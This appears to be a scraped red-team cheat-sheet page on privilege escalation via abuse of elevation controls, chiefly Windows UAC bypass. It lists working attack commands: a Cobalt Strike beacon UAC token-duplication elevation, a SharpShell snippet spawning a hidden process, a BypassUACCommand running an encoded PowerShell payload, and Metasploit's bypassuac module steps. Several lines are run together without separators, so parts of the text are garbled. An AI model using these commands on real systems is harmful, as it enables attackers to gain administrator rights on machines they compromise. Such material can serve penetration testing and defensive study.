Abuse Elevation Control Mechanism
Bypass User Account Control
beacon> elevate uac-token-duplication localhost-beacon-nameSharpShell /code:"var startInfo = new System.Diagnostics.ProcessStartInfo { FileName = @\"C:\Windows\System32\Taskmgr.exe\", WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden }; var taskmgr = new System.Diagnostics.Process { StartInfo = startInfo }; taskmgr.Start(); return taskmgr.Id.ToString();"
BypassUACCommand cmd.exe "/c powershell -enc <blah>"search bypassuac
use exploit/windows/local/bypassuac
set session 1
exploitElevated Execution with Prompt
Setuid and Setgid
Sudo and Sudo Caching
Last updated
Was this helpful?